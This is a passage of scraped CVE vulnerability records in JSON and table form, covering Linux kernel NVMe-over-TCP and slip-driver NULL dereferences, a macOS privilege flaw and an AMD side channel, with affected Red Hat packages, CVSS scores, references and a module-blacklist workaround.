"unaffected", "version": "v5.8.6-10", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/lokistack-gateway-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-525", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/opa-openshift-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-224", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/vector-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.28.1-56", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "credits": [ { "lang": "en", "value": "Red Hat would like to thank Alon Zahavi for reporting this issue." } ], "datePublic": "2023-12-11T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A flaw was found in the Linux kernel\u0027s NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T23:30:10.540Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:0723", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0723" }, { "name": "RHSA-2024:0724", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0724" }, { "name": "RHSA-2024:0725", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0725" }, { "name": "RHSA-2024:0881", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0881" }, { "name": "RHSA-2024:0897", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0897" }, { "name": "RHSA-2024:1248", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1248" }, { "name": "RHSA-2024:2094", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2094" }, { "name": "RHSA-2024:3810", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3810" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6535" }, { "name": "RHBZ#2254053", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254053" } ], "timeline": [ { "lang": "en", "time": "2023-12-11T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-12-11T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: null pointer dereference in nvmet_tcp_execute_request", "workarounds": [ { "lang": "en", "value": "To mitigate this issue, prevent module nvmet-tcp from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically." } ], "x_redhatCweChain": "CWE-476: NULL Pointer Dereference" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-6535", "datePublished": "2024-02-07T21:04:21.409Z", "dateReserved": "2023-12-05T20:50:27.727Z", "dateUpdated": "2024-09-13T23:30:10.540Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6356
Vulnerability from cvelistv5
Published
2024-02-07 21:04
Modified
2024-09-13 23:29
Severity ?
EPSS score ?
Summary
Kernel: null pointer dereference in nvmet_tcp_build_iovec
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:0723 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0724 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0725 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0881 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0897 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1248 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2094 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3810 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-6356 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2254054 | issue-tracking, x_refsource_REDHAT |
Impacted products
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-6356", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-05-02T13:53:04.324723Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:17:04.696Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T08:28:21.329Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:0723", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0723" }, { "name": "RHSA-2024:0724", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0724" }, { "name": "RHSA-2024:0725", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0725" }, { "name": "RHSA-2024:0881", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0881" }, { "name": "RHSA-2024:0897", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0897" }, { "name": "RHSA-2024:1248", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1248" }, { "name": "RHSA-2024:2094", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2094" }, { "name": "RHSA-2024:3810", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3810" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6356" }, { "name": "RHBZ#2254054", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254054" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240415-0002/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.18.1.rt7.320.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.18.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.91.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.58.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.24.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.24.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.52.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::realtime", "cpe:/a:redhat:rhel_eus:9.2::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.52.1.rt14.337.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.91.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-22", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-11", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch6-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v6.8.1-407", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-19", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-proxy-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.0.0-479", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-7", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/eventrouter-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.4.0-247", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/fluentd-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-5", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/log-file-metric-exporter-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.1.0-227", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-curator5-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.1-470", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-loki-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v2.9.6-14", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-view-plugin-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-2", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-24", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-10", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/lokistack-gateway-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-525", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/opa-openshift-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-224", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/vector-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.28.1-56", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "credits": [ { "lang": "en", "value": "Red Hat would like to thank Alon Zahavi for reporting this issue." } ], "datePublic": "2023-12-11T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A flaw was found in the Linux kernel\u0027s NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver and causing kernel panic and a denial of service." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T23:29:59.360Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:0723", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0723" }, { "name": "RHSA-2024:0724", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0724" }, { "name": "RHSA-2024:0725", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0725" }, { "name": "RHSA-2024:0881", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0881" }, { "name": "RHSA-2024:0897", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0897" }, { "name": "RHSA-2024:1248", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1248" }, { "name": "RHSA-2024:2094", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2094" }, { "name": "RHSA-2024:3810", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3810" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6356" }, { "name": "RHBZ#2254054", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254054" } ], "timeline": [ { "lang": "en", "time": "2023-12-11T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-12-11T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: null pointer dereference in nvmet_tcp_build_iovec", "workarounds": [ { "lang": "en", "value": "To mitigate this issue, prevent module nvmet-tcp from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically." } ], "x_redhatCweChain": "CWE-476: NULL Pointer Dereference" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-6356", "datePublished": "2024-02-07T21:04:20.684Z", "dateReserved": "2023-11-28T05:16:10.932Z", "dateUpdated": "2024-09-13T23:29:59.360Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-3898
Vulnerability from cvelistv5
Published
2020-10-22 17:48
Modified
2024-08-04 07:52
Severity ?
EPSS score ?
Summary
A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. An application may be able to gain elevated privileges.
References
▼ | URL | Tags |
---|---|---|
https://support.apple.com/kb/HT211100 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T07:52:19.824Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://support.apple.com/kb/HT211100" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "macOS", "vendor": "Apple", "versions": [ { "lessThan": "macOS Catalina 10.15.4", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. An application may be able to gain elevated privileges." } ], "problemTypes": [ { "descriptions": [ { "description": "An application may be able to gain elevated privileges", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-10-22T17:48:29", "orgId": "286789f9-fbc2-4510-9f9a-43facdede74c", "shortName": "apple" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://support.apple.com/kb/HT211100" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "product-security@apple.com", "ID": "CVE-2020-3898", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "macOS", "version": { "version_data": [ { "version_affected": "\u003c", "version_value": "macOS Catalina 10.15.4" } ] } } ] }, "vendor_name": "Apple" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. An application may be able to gain elevated privileges." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "An application may be able to gain elevated privileges" } ] } ] }, "references": { "reference_data": [ { "name": "https://support.apple.com/kb/HT211100", "refsource": "MISC", "url": "https://support.apple.com/kb/HT211100" } ] } } } }, "cveMetadata": { "assignerOrgId": "286789f9-fbc2-4510-9f9a-43facdede74c", "assignerShortName": "apple", "cveId": "CVE-2020-3898", "datePublished": "2020-10-22T17:48:29", "dateReserved": "2019-12-18T00:00:00", "dateUpdated": "2024-08-04T07:52:19.824Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-41858
Vulnerability from cvelistv5
Published
2023-01-17 00:00
Modified
2024-08-03 12:56
Severity ?
EPSS score ?
Summary
A flaw was found in the Linux kernel. A NULL pointer dereference may occur while a slip driver is in progress to detach in sl_tx_timeout in drivers/net/slip/slip.c. This issue could allow an attacker to crash the system or leak internal kernel information.
References
Impacted products
▼ | Vendor | Product |
---|---|---|
n/a | Linux kernel |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:56:38.264Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/ec4eb8a86ade4d22633e1da2a7d85a846b7d1798" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230223-0006/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "unknown" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw was found in the Linux kernel. A NULL pointer dereference may occur while a slip driver is in progress to detach in sl_tx_timeout in drivers/net/slip/slip.c. This issue could allow an attacker to crash the system or leak internal kernel information." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-23T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/ec4eb8a86ade4d22633e1da2a7d85a846b7d1798" }, { "url": "https://security.netapp.com/advisory/ntap-20230223-0006/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-41858", "datePublished": "2023-01-17T00:00:00", "dateReserved": "2022-09-30T00:00:00", "dateUpdated": "2024-08-03T12:56:38.264Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-20569
Vulnerability from cvelistv5
Published
2023-08-08 17:02
Modified
2024-09-23 03:18
Severity ?
EPSS score ?
Summary
A side channel vulnerability on some of the AMD CPUs may allow an attacker to influence the return address prediction. This may result in speculative execution at an attacker-controlled address, potentially leading to information disclosure.
References
Impacted products
